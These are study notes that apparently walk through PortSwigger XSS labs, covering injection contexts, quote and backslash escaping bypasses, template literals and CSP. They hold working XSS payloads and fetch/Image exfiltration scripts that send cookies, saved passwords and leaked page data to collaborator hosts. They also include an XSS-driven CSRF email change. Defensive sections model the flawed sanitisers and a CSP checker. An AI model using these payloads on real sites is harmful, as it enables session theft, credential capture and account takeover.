<link rel="canonical" accesskey="x" onclick="alert(1)" />
```

### LAB - Reflected XSS in canonical link tag

![image](https://hackmd.io/_uploads/Hy1oKcgBp.png)

![image](https://hackmd.io/_uploads/S1wgWoxrp.png)

![image](https://hackmd.io/_uploads/S1K6Xoxrp.png)

```
<img src=x onerror=alert(1)>
```

#### Identify

![image](https://hackmd.io/_uploads/rJPXNigST.png)

![image](https://hackmd.io/_uploads/rJA5NseSa.png)

```
/?'x='1
```

![image](https://hackmd.io/_uploads/BJMCSsgHa.png)

Payload:

```
/?'accesskey='x'onclick='alert(1)
```

(The payload contains no spaces: a space in the URL would be sent as `%20`, and the single quotes alone are enough to close one attribute value and open the next inside the `<link>` tag.)

![image](https://hackmd.io/_uploads/BJgSLixHT.png)

![image](https://hackmd.io/_uploads/Sk7TwslB6.png)

Solved!!
---

## XSS in JavaScript

When our controllable source lands inside a JavaScript block, we can try to terminate the current script and inject our own payload.

### Terminating the Current Script

The common way is to use `</script>` to terminate the script block. For example:

```
<script>
...
var name = 'user controllable data'
...
</script>
```

Here we inject a `</script>` tag followed by an HTML tag to trigger the XSS, as shown below:

```
</script><svg onload=alert(1)>
```

This works because the browser's HTML parser runs first and ends the script element at the first `</script>` it sees, even inside a JavaScript string; only afterwards is the (now truncated) script handed to the JavaScript engine, and the injected element is parsed as ordinary HTML.

### LAB - Reflected XSS into a JavaScript string with single quote and backslash escaped

#### Mapping the target

![image](https://hackmd.io/_uploads/S1MvSefHp.png)

![image](https://hackmd.io/_uploads/HJhFSxzBa.png)

#### Analyse attack surface

![image](https://hackmd.io/_uploads/ryfy8gfSp.png)

/?search

![image](https://hackmd.io/_uploads/SJsFIgzSa.png)

There are two XSS contexts we can try.

#### Identify

Try `<svg onload=alert(1)>` between the HTML tags:

![image](https://hackmd.io/_uploads/B10YPlfBT.png)

The script variable is not properly sanitised. Attempt to terminate the script and inject the HTML payload to trigger XSS.

Payload: `</script><svg onload=alert(1)>`

![image](https://hackmd.io/_uploads/rJIlYxzr6.png)

![image](https://hackmd.io/_uploads/BkA7YxMHa.png)

Solved!!

---

### Breaking out of a JavaScript string

In some situations the XSS context is inside a quoted string; we can use a few techniques to break out of the string and execute JavaScript.

==Note== It is essential to repair the script afterwards, since our injected payload may otherwise cause the whole script to fail with a syntax error.

Payloads: the `-` operator separates the string from our JavaScript expression.
```
// Using single quotes
meow'-alert(document.cookie)-'

// Using double quotes
meow"-alert(document.cookie)-"

// Closing the string, injecting a statement, and commenting out the rest of the line
meow';alert(document.domain)//
```

![image](https://hackmd.io/_uploads/ryvhepGS6.png)

![image](https://hackmd.io/_uploads/ryG7ZTfHp.png)

### LAB - Reflected XSS into JavaScript with angle brackets HTML-encoded

#### Mapping Structure

![image](https://hackmd.io/_uploads/SJ_AmafHa.png)

#### Analyse Attack surface

![image](https://hackmd.io/_uploads/SJOPVTMHa.png)

```
/post?postId=2
/?search=?
/resources/images/tracker.gif?searchTerms=171171
```

#### Identify

==/?search=?==

![image](https://hackmd.io/_uploads/SkOyU6GHT.png)

```
string</script>
```

![image](https://hackmd.io/_uploads/S1n6U6zB6.png)

```
?search=171171';alert(1);//
```

![image](https://hackmd.io/_uploads/HySHvpzra.png)

```
?search=171171'-alert(1)-'meow
```

![image](https://hackmd.io/_uploads/rk-Awpzra.png)

![image](https://hackmd.io/_uploads/SysAvafHa.png)

Solved!!

---

### Bypass Backslash Escaping

Some applications try to stop quotes from breaking out of the string by escaping them with a backslash, so `'` becomes `\'` and the simple payload stays inside the string:

```
';alert(document.domain)//     ->  var s = '\';alert(document.domain)//';
```

If the backslash itself is not escaped, we add our own backslash in front of the quote. The application turns `\'` into `\\'`: the first backslash now escapes the second one, and the quote is left alone to close the string.

```
\';alert(document.domain)//    ->  var s = '\\';alert(document.domain)//';
```

### LAB - Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped

#### Mapping target

![image](https://hackmd.io/_uploads/Sk7_zCGST.png)

#### Analyse attack surface

![image](https://hackmd.io/_uploads/SJ8RzCGSp.png)

Potential injection points:
```
GET /post?postId=5
GET /?search=227860
GET /resources/images/tracker.gif?searchTerms=227860
```

#### Identify

![image](https://hackmd.io/_uploads/S1pYm0zHp.png)

Attempt:

```
<svg onload=alert(1)>
```

![image](https://hackmd.io/_uploads/Bkl1ERGS6.png)

Angle brackets are encoded, so we cannot use tags. Try closing the string with a single quote to trigger the XSS:

```
?search=227860';alert(1)//
```

![image](https://hackmd.io/_uploads/SJ5x8Cfr6.png)

The quote gets escaped, so we put a backslash in front of it:

```
/?search=227860\';alert(1)//
```

or

```
/?search=227860\'-alert(1);//
```

![image](https://hackmd.io/_uploads/ryPULRfSa.png)

It looks like it succeeded!

![image](https://hackmd.io/_uploads/BkuK8CMB6.png)

![image](https://hackmd.io/_uploads/HkLaL0zST.png)

![image](https://hackmd.io/_uploads/rJIxuAMBa.png)

![image](https://hackmd.io/_uploads/HkZRI0zSp.png)

### Bypass WAF or filter using `throw`

Assigning `alert` to the global `onerror` handler and then throwing a value lets us call a function with an argument without using parentheses:

```
onerror=alert;throw 1
```

```
<script>onerror=alert;throw 1</script>
```

Inside an inline event handler the bare name `onerror` resolves to the element's own `onerror` property, so there it has to be written as `window.onerror`:

```
<img src=x onerror="window.onerror=alert;throw 1">
```

![image](https://hackmd.io/_uploads/S1EYCRzSa.png)

More technique details: https://portswigger.net/research/xss-without-parentheses-and-semi-colons

### LAB - Reflected XSS in a JavaScript URL with some characters blocked

#### Mapping target

![image](https://hackmd.io/_uploads/H1LFNymSp.png)

#### Analyse attack surface

![image](https://hackmd.io/_uploads/H1R_N1mST.png)

`POST /post/comment`

Skipped.

----

### HTML encoding bypass

When the XSS context is inside an HTML tag's JavaScript event handler attribute, it is possible to use HTML encoding to bypass the input filter.
Why it works: the browser HTML-decodes an attribute value while parsing the tag, before the handler's content is handed to the JavaScript engine. An entity that the filter never recognised as a quote therefore arrives in the script as a real quote.

```
'  ->  &apos;
"  ->  &quot;
```

![image](https://hackmd.io/_uploads/B1Nkc2pSp.png)

Vulnerable code:

```htmlembedded
<a href="" onclick="var name = '123&apos;-alert(1);//&apos;'">meow</a>
```

![image](https://hackmd.io/_uploads/rkc1T2aH6.png)

The browser decodes the event attribute value before executing it, so `&apos;` becomes `'` and closes the string. Exploiting this lets us bypass an input filter that only looks for literal quotes and backslashes.

==Note== This only works because the decoded value of a handler attribute is then interpreted as JavaScript. In a regular attribute (`href`, `value`, ...) the decoded character is just data: an entity can never break out of the attribute it is in.

![image](https://hackmd.io/_uploads/BkIci06Ba.png)

### LAB - Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped

#### Mapping The Target

Auto scan (crawl) -> GET

![image](https://hackmd.io/_uploads/rJmRihCS6.png)

Manual testing -> POST

![image](https://hackmd.io/_uploads/H1Ewj3RHa.png)

#### Analyse Attack Surface

![image](https://hackmd.io/_uploads/HJ5jn3CBp.png)

Evaluate user input (comment functionality), `comment` parameter:

![image](https://hackmd.io/_uploads/ryUagaCrp.png)

![image](https://hackmd.io/_uploads/Hy2YeaCB6.png)

#### Identify

XSS between the HTML tags:

```
<svg onload=alert(1)>
```

![image](https://hackmd.io/_uploads/Sysjbp0Ha.png)

In a JavaScript string, testing:

![image](https://hackmd.io/_uploads/H11aGa0S6.png)

```
123'-alert(1)-'
```

![image](https://hackmd.io/_uploads/rk24QpRB6.png)

Bypass backslash:

```
meow\'-alert(1)-\'
```

![image](https://hackmd.io/_uploads/Hyabr60Ha.png)

![image](https://hackmd.io/_uploads/HyTgHTRHT.png)

The controllable source is inside a JavaScript event handler, so we can HTML-encode the single quote to bypass the input sanitisation.
![image](https://hackmd.io/_uploads/SkNHLT0r6.png)

HTML-encoded:

```
&apos;-alert(1)-&apos;
&#x27;-alert(1)-&#x27;
```

URL-encoded (as sent in the request):

```
http%3A123%26apos%3B-alert%281%29-%26apos%3B
```

![image](https://hackmd.io/_uploads/Hy2Sc6CHT.png)

![image](https://hackmd.io/_uploads/Hy2eKpRra.png)

![image](https://hackmd.io/_uploads/ryzD9pCSp.png)

![image](https://hackmd.io/_uploads/rkRHKaAST.png)

Solved!!

---

### XSS in JavaScript template literals

JavaScript template literals are strings delimited by backticks (`` ` ``) that can embed expressions written as `${expression}`. If user input lands inside the literal's source, a `${...}` in it is evaluated as code, with no quotes or angle brackets needed. Here is an example:

```javascript
<p id=meow></p>
<script>
    var name = "meowhecker"; // substituting a variable like this is safe: its value is not re-parsed
    document.getElementById('meow').innerHTML = `I am ${name}`;
</script>
```

![image](https://hackmd.io/_uploads/HJy1nA0rT.png)

![image](https://hackmd.io/_uploads/SJwyh0ASp.png)

```htmlembedded
<p id=meow></p>
<script>
    // The server wrote the user input  meow${alert(1)}  straight into the literal's source:
    var greeting = `I am meow${alert(1)}`;   // alert(1) runs while the literal is evaluated
    document.getElementById('meow').innerHTML = greeting;
</script>
```

![image](https://hackmd.io/_uploads/ByhqpC0Bp.png)

![image](https://hackmd.io/_uploads/Sk72pR0ra.png)

### LAB - Reflected XSS into a JavaScript template literal with angle brackets, single, double quotes, backslash and backticks Unicode-escaped

#### Mapping Target

![image](https://hackmd.io/_uploads/HJGqHkkU6.png)

#### Analyse Attack Surface

![image](https://hackmd.io/_uploads/Hy7aB1J86.png)

Evaluate user input:

![image](https://hackmd.io/_uploads/HkCvL1yI6.png)

#### Identify

Context: inside a JavaScript template literal. None of the escaped characters are needed:

```
${alert(1)}
```

![image](https://hackmd.io/_uploads/S1S9vk1La.png)

![image](https://hackmd.io/_uploads/B1p3D1JUT.png)

![image](https://hackmd.io/_uploads/SyVpPkyL6.png)

Solved!!
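Three of the labs above are broken by the same kind of mistake: an output filter that does not match the context the data lands in. The stored DOM XSS lab escapes only the first `<` and `>`; the reflected DOM XSS lab and the two JavaScript-string labs escape quotes but not the backslash; the onclick lab escapes quotes but forgets that the browser HTML-decodes the attribute before the JavaScript engine sees it. The following is an added example, my own code and not the labs' or PortSwigger's: each sanitiser is modelled the way the server applies it, the resulting JavaScript is run with a stubbed `alert()` to prove the payload really executes, and the correct per-context encoders are shown beside them. The request bodies and attribute templates are modelled on the labs, not copied from them.

```javascript
// Added example: three lab sanitisers, what the engine actually executes, and safe encoders.

// Stand-in for the JS engine: runs generated JavaScript with alert() recorded instead of shown.
function runWithStubAlert(js) {
  const calls = [];
  const alert = (msg) => calls.push(String(msg)); // direct eval() below resolves alert() to this
  let error = null;
  try { eval(js); } catch (e) { error = e.constructor.name; }
  return { calls, error };
}

// Bug 1 (stored DOM XSS lab): replace() with a string pattern rewrites only the FIRST match.
function escapeFirstOnly(comment) {
  return comment.replace('<', '&lt;').replace('>', '&gt;');
}

// Bug 2 (reflected DOM XSS lab, JavaScript-string labs): the quote is escaped, the backslash is not.
function escapeQuotesOnly(input, quote) {
  return input.split(quote).join('\\' + quote);
}
// Server builds the search JSON; the client runs eval('var searchResultsObj = ' + body).
function evalSink(term, escapeInner) {
  const body = '{"results":[],"searchTerm":"' + escapeInner(term) + '"}';
  return runWithStubAlert('var searchResultsObj = ' + body);
}
// Server writes the term into a JS string literal (literal() returns the whole literal).
function stringSink(term, literal) {
  return runWithStubAlert('var searchTerms = ' + literal(term) + ';');
}

// Bug 3 (onclick lab): quotes and backslashes are escaped, but the attribute value is
// HTML-decoded by the browser before it is parsed as JavaScript.
function decodeHtmlEntities(attrValue) {
  const named = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };
  return attrValue.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (whole, body) => {
    if (body[0] !== '#') return named[body.toLowerCase()] ?? whole;
    const cp = /^#x/i.test(body) ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
    return String.fromCodePoint(cp);
  });
}
function escapeForOnclickNaive(website) {
  // the lab's defence: < > " HTML-encoded, ' and \ backslash-escaped, & left alone
  return website.replace(/\\/g, '\\\\').replace(/'/g, "\\'")
    .replace(/"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');
}
function onclickSink(website, encodeWebsite) {
  // onclick="var tracker={track(){}};tracker.track('WEBSITE');"  as written by the server
  const attr = "var tracker={track(){}};tracker.track('" + encodeWebsite(website) + "');";
  return runWithStubAlert(decodeHtmlEntities(attr));
}

// Safe encoders: choose by the context the value lands in, apply innermost context first.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeHtml(s) { return s.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]); }   // text or attribute
function encodeJsString(s) {                                                        // JS string literal
  return JSON.stringify(s).replace(/[<>&\u2028\u2029]/g,
    (c) => '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}
const jsonInner = (s) => JSON.stringify(s).slice(1, -1);   // JSON escapes the backslash too
// onclick done right: JS string literal first, then make that safe inside an HTML attribute.
function onclickSinkSafe(website) {
  const attr = 'var tracker={track(){}};tracker.track(' + encodeHtml(encodeJsString(website)) + ');';
  return runWithStubAlert(decodeHtmlEntities(attr));
}
```

`evalSink('\\"-alert(1)}//', (t) => escapeQuotesOnly(t, '"'))` records a call to `alert` with `1` and no syntax error, exactly the lab payload; the same input through `jsonInner` stays a string. `onclickSink('http://x?&apos;-alert(1)-&apos;', escapeForOnclickNaive)` also records the call, because after entity decoding the engine sees `tracker.track('http://x?'-alert(1)-'')`, whereas `onclickSinkSafe` turns the `&` into `\u0026` inside the literal before the attribute encoding, so nothing is left for the browser to decode into a quote. `encodeJsString` additionally escapes `<`, `>` and `&`, which is what keeps a `</script>` in the data from ending the script block; and since it always emits a double-quoted literal, a `${...}` in the data is inert, which is the fix for the template-literal lab as well.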
### Client-Side Template Injection (skipped)

---

# Exploit XSS

```
alert(document.domain)
print()
prompt()
```

Those payloads are only a PoC that proves we can execute arbitrary JavaScript. To show that the XSS is a real, high-severity issue, we need to fully exploit it.

## Steal Cookies

Using `fetch`, we can make the victim's browser send us a request whose body is `document.cookie`. There are some limitations:

- the victim is not logged in
- the session cookie has the `HttpOnly` flag, so it is not readable from JavaScript
- the session might be bound to an additional factor such as the user's IP address
- the session might time out before we use it

## LAB - Exploiting XSS to steal cookies

### Mapping Target

- crawl scanning
- manual testing of the post functionality

![image](https://hackmd.io/_uploads/rk3fyZgLp.png)

### Analyse Attack Surface

Analyse issues:

![image](https://hackmd.io/_uploads/Bk8P4ZeU6.png)

Evaluate user input:

![image](https://hackmd.io/_uploads/HJOYzbe8T.png)

### Identify

XSS between HTML tags:

```
<svg onload=alert(document.domain)>
or
<svg onload=alert(document.cookie)>
```

Testing -> comment
Testing -> email prefix

![image](https://hackmd.io/_uploads/SyV8mWeLp.png)

![image](https://hackmd.io/_uploads/H1798bgLT.png)

### Exploit

```javascript
fetch('https://izlpiklnyzy19pmky18wsf0yspygm7aw.oastify.com', {
    method: 'POST',
    mode: 'no-cors',      // cross-origin POST without CORS; we never need to read the response
    body: document.cookie
});
```

or

```htmlembedded
<svg onload="fetch('https://k7srqmtp6163hrum63gy0h800r6iuaiz.oastify.com', {method: 'POST', mode: 'no-cors', body: document.cookie});"></svg>
```

==Note== When the payload goes into an HTML event attribute, the handler body has to be wrapped in single or double quotes, because it contains spaces and commas that would otherwise end the attribute value and break the syntax.

![image](https://hackmd.io/_uploads/SkTx0-g8p.png)

#### Testing as own account

![image](https://hackmd.io/_uploads/Hy0RQfgLa.png)

#### Waiting for the administrator

![image](https://hackmd.io/_uploads/SyFIRZxLp.png)

![image](https://hackmd.io/_uploads/H11OlzeLa.png)

![image](https://hackmd.io/_uploads/r1LdxGxL6.png)

Solved!!!

## XSS to capture passwords

If the victim lets their browser remember passwords, a script can easily extract the username and password that the browser auto-fills.
![image](https://hackmd.io/_uploads/r1eIOXl8T.png)

This technique requires the victim to have clicked the "Save Password" button; the next time they log in, the browser automatically fills in the username and password.

![image](https://hackmd.io/_uploads/rJOe94eLT.png)

e.g.

```htmlembedded=
<form method="post">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" onclick="document.getElementById('victimPassword').innerHTML=password.value" value="click">
</form>
<p id="victimUserName"></p>
<p id="victimPassword"></p>
```

![image](https://hackmd.io/_uploads/ByrQhmxU6.png)

```htmlembedded
<input id="username" type="text" name="username">
<input type="password" name="password" onchange="passwordExists(username.value,this.value)">
<p id="victimUserName"></p>
<p id="victimPassword"></p>
<script>
  function passwordExists(username, password) {
    document.getElementById('victimUserName').innerHTML = username
    document.getElementById('victimPassword').innerHTML = password
  }
</script>
```

![image](https://hackmd.io/_uploads/BkCoGExL6.png)

```htmlembedded
<input id="username" type="text" name="username">
<input type="password" name="password" onchange="userPass(username.value,this.value)">
<script>
  function userPass(username, password) {
    fetch("https://hzkoijlmyyy09omjy08vse0xsoyfm8ax.oastify.com", {
      method: "POST",
      mode: "no-cors",
      body: username,password // two properties: body is only the username, `password` is an ignored extra key
    })
  }
</script>
```

![image](https://hackmd.io/_uploads/HkN3S4gU6.png)
![image](https://hackmd.io/_uploads/H1JQLVlU6.png)

## LAB: Exploiting cross-site scripting to capture passwords

This XSS vulnerability is similar to the previous lab, so I'll skip documenting the steps to identify the XSS.
Exploit

```htmlembedded=
<!-- Works successfully -->
<input id="username" type="text" name="username">
<input type="password" name="password" onchange="userPass(username.value,this.value)">
<script>
  function userPass(username, password) {
    fetch("https://hzkoijlmyyy09omjy08vse0xsoyfm8ax.oastify.com", {
      method: "POST",
      mode: "no-cors",
      body: username+':'+password
    })
  }
</script>

<!-- Alternatively -->
<input name=username id=username>
<input type=password name=password onchange="if(this.value.length)fetch('https://BURP-COLLABORATOR-SUBDOMAIN',{
  method:'POST',
  mode: 'no-cors',
  body:username.value+':'+this.value
});">
```

![image](https://hackmd.io/_uploads/Byb2cNl86.png)
![image](https://hackmd.io/_uploads/H1yKd4l8a.png)
![image](https://hackmd.io/_uploads/r15H_EgI6.png)
![image](https://hackmd.io/_uploads/SyRXOExIp.png)

Solved !!

## Exploiting cross-site scripting to perform CSRF

XSS allows an attacker to make a normal user perform specific actions, such as:

- making the victim send a message;
- making the victim commit a backdoor to a source code repository;
- making the victim transfer their Bitcoin.

Some websites do not require the password to change the email address. This presents an opportunity for exploitation: we can change the victim's email to one that we control and then trigger a password reset to gain access to the victim's account. These exploits fall under the category of CSRF.

CSRF can occur as a standalone vulnerability, exploited with a phishing HTML page; however, it can be mitigated through the use of anti-CSRF tokens. If the website also has an XSS vulnerability, the CSRF token can be bypassed, because script running in the site's origin can read the token.

## LAB: Exploiting XSS to perform CSRF

### Mapping the target

![image](https://hackmd.io/_uploads/S1EBQBeIa.png)

### Analysis Attack surface

Functionality design fault

![image](https://hackmd.io/_uploads/S1riQHeI6.png)

Users can update their email without being asked for a password.
Evaluated user input

GET /post?postId=5

![image](https://hackmd.io/_uploads/HyXVVrlUp.png)
![image](https://hackmd.io/_uploads/rJHD4BeU6.png)

### Identify

Determine whether updating the email is vulnerable to a CSRF attack.

![image](https://hackmd.io/_uploads/rJz64HxIT.png)

It has an anti-CSRF token. We can try to find an XSS to extract the token and bypass this protection.

Finding XSS

![image](https://hackmd.io/_uploads/SJ9PSSlL6.png)
![image](https://hackmd.io/_uploads/r1GuSrg8T.png)

The comment functionality allows us to execute arbitrary JavaScript.

#### Exploit

We can write code that uses the XSS to bypass the CSRF token. We need two requests: the first retrieves the token, the second changes the email address to one we control.

```htmlembedded
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/my-account',true);
req.send();
function handleResponse() {
    var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
    var changeReq = new XMLHttpRequest();
    changeReq.open('post', '/my-account/change-email', true);
    changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
```

![image](https://hackmd.io/_uploads/BkHKW8lUa.png)

# Dangling markup attack

A dangling markup attack lets us retrieve sensitive data from the page.

Example:

```
<input type="text" name="input" value="user can control"
```

If the input is not filtered for `">`, we would normally attempt XSS. Suppose the application has CSP protection, so XSS is not possible. We can still inject a dangling `img` tag, so that everything in the page after the `src` attribute becomes part of the requested URL, as in the following payload:

```
"><img src='//meowhecker.com?
```

## LAB: Reflected XSS protected by very strict CSP, with dangling markup attack
### Mapping Target

Automated crawl and manual crawl

![image](https://hackmd.io/_uploads/rkns6oGU6.png)

### Analysis Attack Surface

Evaluated user input

![image](https://hackmd.io/_uploads/S1QNK3MIa.png)
![image](https://hackmd.io/_uploads/BkEgq3z8a.png)

Flawed design endpoint: /my-account

![image](https://hackmd.io/_uploads/rJe4TizLp.png)

### Identify Vuln

It is possible to use CSRF to modify the email and then reset the password. We need an XSS to grab the CSRF token.

Identify reflected XSS, ==context in an HTML attribute==

Payload

```
meow"><svg onload="print()
```

![image](https://hackmd.io/_uploads/ByNro3f8a.png)

XSS does not work (maybe there is a CSP).

![image](https://hackmd.io/_uploads/rkrXphfU6.png)

Using the dangling markup technique to obtain the CSRF token:

```
meow"><img src=//ydfaxb1mr2u2paifa6ydzqgrdij971vq.oastify.com?
```

Fails (Chrome's built-in protection mechanism).

![image](https://hackmd.io/_uploads/SkPT32G8a.png)

It has a CSP.

### Exploit Vuln

![image](https://hackmd.io/_uploads/By8mD2fL6.png)

The `src` of an `Image()` object can be used to make the application interact with our C2 server:

```
<script>
var asyncImg = new Image()
asyncImg.src = 'https://hackmd.io/_uploads/rJe4TizLp.png'
asyncImg.onload = function () {
  console.log('Async request successful');
}
</script>
```

![image](https://hackmd.io/_uploads/BkZ-L2fLa.png)

`<base target="_blank">`: the `base` tag is used to set document-wide defaults; its `target` attribute determines which browsing context `a` tags open in, e.g.
`_blank` opens a new window. We can use `window.name` to read the target value, for example:

```htmlembedded
<a href="http://127.0.0.1">click</a><base target="meowhecker">
```

![image](https://hackmd.io/_uploads/r18rjpMUa.png)

```
<a href="http://exploit-0a5200dd03196146803e6b9c01ee0068.exploit-server.net">Click me<base target='
```

![image](https://hackmd.io/_uploads/rJrAkAfIa.png)

```htmlembedded=
<script>
if (window.name) {
  new Image().src = '//w2z8m9qkg0j0e87dz4nboo5p2g87w1kq.oastify.com?' + encodeURIComponent(window.name);
} else {
  location = 'https://0af1008d0341618c808c6c4f00330086.web-security-academy.net/my-account?email="><a+href%3d"https%3a//exploit-0a5200dd03196146803e6b9c01ee0068.exploit-server.net/exploit">Click+Me</a><base+target%3d%27'
}
</script>
```

![image](https://hackmd.io/_uploads/ryOHCaGUT.png)

Local account testing successful. Send to the victim:

![image](https://hackmd.io/_uploads/ByKOgCGUT.png)

```
<script>
if (window.name) {
  new Image().src = '//wnn879bk1040z8sdk48b9oqpngt7h25r.oastify.com?' + encodeURIComponent(window.name);
} else {
  location = 'https://0af1008d0341618c808c6c4f00330086.web-security-academy.net/my-account?email="><a+href%3d"https%3a//exploit-0a5200dd03196146803e6b9c01ee0068.exploit-server.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27';
}
</script>
```

(skip)

# CSP

## Impact

- Impersonate or masquerade as the victim user.
- Read any data that the user is able to access.
- Capture the user's login credentials.
- Inject trojan functionality into the website.

The impact of an XSS depends on what application functionality can be exploited.

## Content Security Policy (CSP)

Some websites employ a CSP to mitigate the exploitation of the vulnerability. In fact, there are many ways to circumvent this mechanism.
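Added example, not from the original notes: a small checker that parses a `Content-Security-Policy` header and reports whether the channels used in the labs above (`fetch()` to an external host, `Image()`/`img` to an external host, inline `<script>`) are still allowed by it. `parseCsp`, `sourcesFor`, `allowsOrigin` and `allowsInlineScript` are constructed names; only `'none'`, `*`, `'self'`, scheme-only and exact-host source expressions are modelled, not wildcard hosts, nonces or hashes.

```javascript
// Added example, not from the original notes: evaluate a CSP header against the
// exfiltration channels seen in the labs above. Names are constructed; only
// 'none', '*', 'self', scheme-only and exact-host expressions are modelled.

// Directives that fall back to default-src when they are absent (CSP spec).
// base-uri and form-action deliberately do not fall back.
const FALLS_BACK_TO_DEFAULT = new Set(['script-src', 'img-src', 'connect-src']);

// Parse "a b 'c'; d e" into a Map of directive -> array of source expressions.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    policy.set(tokens[0].toLowerCase(), tokens.slice(1).map(t => t.toLowerCase()));
  }
  return policy;
}

// Effective source list for a directive, honouring default-src fallback.
// null means the policy says nothing, so the browser allows everything.
function sourcesFor(policy, directive) {
  if (policy.has(directive)) return policy.get(directive);
  if (FALLS_BACK_TO_DEFAULT.has(directive)) return policy.get('default-src') || null;
  return null;
}

// Does `directive` permit loading from `origin` (e.g. "https://evil.example")
// on a page served from `pageOrigin`?
function allowsOrigin(policy, directive, origin, pageOrigin) {
  const list = sourcesFor(policy, directive);
  if (list === null) return true;
  const url = new URL(origin);
  return list.some(src => {
    if (src === "'none'") return false;
    if (src === '*') return true;
    if (src === "'self'") return origin === pageOrigin;
    if (src.endsWith(':')) return url.protocol === src;      // e.g. "https:"
    return url.host === src.replace(/^https?:\/\//, '');    // exact host match
  });
}

// Inline <script> and on* handlers (the payloads above) need 'unsafe-inline'.
function allowsInlineScript(policy) {
  const list = sourcesFor(policy, 'script-src');
  return list === null || list.includes("'unsafe-inline'");
}
```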